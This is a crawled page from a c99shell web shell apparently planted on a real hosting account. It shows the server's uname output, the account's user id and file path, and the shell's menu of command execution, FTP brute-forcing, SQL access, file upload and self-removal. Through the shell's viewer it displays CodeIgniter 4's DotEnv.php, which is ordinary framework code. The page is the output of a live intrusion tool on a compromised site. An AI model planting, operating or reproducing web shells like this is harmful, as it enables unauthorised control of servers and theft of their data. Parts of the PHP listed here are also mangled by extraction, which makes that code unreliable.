smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/system/Config/   drwxr-xr-x
Free 3473.26 GB of 4265.01 GB (81.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     DotEnv.php (6.72 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of CodeIgniter 4 framework.
 *
 * (c) CodeIgniter Foundation <admin@codeigniter.com>
 *
 * For the full copyright and license information, please view
 * the LICENSE file that was distributed with this source code.
 */

namespace CodeIgniter\Config;

use 
InvalidArgumentException;

/**
 * Environment-specific configuration
 */
class DotEnv
{
    
/**
     * The directory where the .env file can be located.
     *
     * @var string
     */
    
protected $path;

    
/**
     * Builds the path to our file.
     */
    
public function __construct(string $pathstring $file '.env')
    {
        
$this->path rtrim($pathDIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR $file;
    }

    
/**
     * The main entry point, will load the .env file and process it
     * so that we end up with all settings in the PHP environment vars
     * (i.e. getenv(), $_ENV, and $_SERVER)
     */
    
public function load(): bool
    
{
        
$vars $this->parse();

        return 
$vars !== null;
    }

    
/**
     * Parse the .env file into an array of key => value
     */
    
public function parse(): ?array
    {
        
// We don't want to enforce the presence of a .env file, they should be optional.
        
if (! is_file($this->path)) {
            return 
null;
        }

        
// Ensure the file is readable
        
if (! is_readable($this->path)) {
            throw new 
InvalidArgumentException("The .env file is not readable: {$this->path}");
        }

        
$vars = [];

        
$lines file($this->pathFILE_IGNORE_NEW_LINES FILE_SKIP_EMPTY_LINES);

        foreach (
$lines as $line) {
            
// Is it a comment?
            
if (strpos(trim($line), '#') === 0) {
                continue;
            }

            
// If there is an equal sign, then we know we are assigning a variable.
            
if (strpos($line'=') !== false) {
                [
$name$value] = $this->normaliseVariable($line);
                
$vars[$name]    = $value;
                
$this->setVariable($name$value);
            }
        }

        return 
$vars;
    }

    
/**
     * Sets the variable into the environment. Will parse the string
     * first to look for {name}={value} pattern, ensure that nested
     * variables are handled, and strip it of single and double quotes.
     */
    
protected function setVariable(string $namestring $value '')
    {
        if (! 
getenv($nametrue)) {
            
putenv("{$name}={$value}");
        }

        if (empty(
$_ENV[$name])) {
            
$_ENV[$name] = $value;
        }

        if (empty(
$_SERVER[$name])) {
            
$_SERVER[$name] = $value;
        }
    }

    
/**
     * Parses for assignment, cleans the $name and $value, and ensures
     * that nested variables are handled.
     */
    
public function normaliseVariable(string $namestring $value ''): array
    {
        
// Split our compound string into its parts.
        
if (strpos($name'=') !== false) {
            [
$name$value] = explode('='$name2);
        }

        
$name  trim($name);
        
$value trim($value);

        
// Sanitize the name
        
$name str_replace(['export''\'''"'], ''$name);

        
// Sanitize the value
        
$value $this->sanitizeValue($value);
        
$value $this->resolveNestedVariables($value);

        return [
$name$value];
    }

    
/**
     * Strips quotes from the environment variable value.
     *
     * This was borrowed from the excellent phpdotenv with very few changes.
     * https://github.com/vlucas/phpdotenv
     *
     * @throws InvalidArgumentException
     */
    
protected function sanitizeValue(string $value): string
    
{
        if (! 
$value) {
            return 
$value;
        }

        
// Does it begin with a quote?
        
if (strpbrk($value[0], '"\'') !== false) {
            
// value starts with a quote
            
$quote $value[0];

            
$regexPattern sprintf(
                
'/^
                %1$s          # match a quote at the start of the value
                (             # capturing sub-pattern used
                 (?:          # we do not need to capture this
                 [^%1$s\\\\] # any character other than a quote or backslash
                 |\\\\\\\\   # or two backslashes together
                 |\\\\%1$s   # or an escaped quote e.g \"
                 )*           # as many characters that match the previous rules
                )             # end of the capturing sub-pattern
                %1$s          # and the closing quote
                .*$           # and discard any string after the closing quote
                /mx'
,
                
$quote
            
);

            
$value preg_replace($regexPattern'$1'$value);
            
$value str_replace("\\{$quote}"$quote$value);
            
$value str_replace('\\\\''\\'$value);
        } else {
            
$parts explode(' #'$value2);
            
$value trim($parts[0]);

            
// Unquoted values cannot contain whitespace
            
if (preg_match('/\s+/'$value) > 0) {
                throw new 
InvalidArgumentException('.env values containing spaces must be surrounded by quotes.');
            }
        }

        return 
$value;
    }

    
/**
     *  Resolve the nested variables.
     *
     * Look for ${varname} patterns in the variable value and replace with an existing
     * environment variable.
     *
     * This was borrowed from the excellent phpdotenv with very few changes.
     * https://github.com/vlucas/phpdotenv
     */
    
protected function resolveNestedVariables(string $value): string
    
{
        if (
strpos($value'$') !== false) {
            
$value preg_replace_callback(
                
'/\${([a-zA-Z0-9_\.]+)}/',
                function (
$matchedPatterns) {
                    
$nestedVariable $this->getVariable($matchedPatterns[1]);

                    if (
$nestedVariable === null) {
                        return 
$matchedPatterns[0];
                    }

                    return 
$nestedVariable;
                },
                
$value
            
);
        }

        return 
$value;
    }

    
/**
     * Search the different places for environment variables and return first value found.
     *
     * This was borrowed from the excellent phpdotenv with very few changes.
     * https://github.com/vlucas/phpdotenv
     *
     * @return string|null
     */
    
protected function getVariable(string $name)
    {
        switch (
true) {
            case 
array_key_exists($name$_ENV):
                return 
$_ENV[$name];

            case 
array_key_exists($name$_SERVER):
                return 
$_SERVER[$name];

            default:
                
$value getenv($name);

                
// switch getenv default to null
                
return $value === false null $value;
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0042 ]--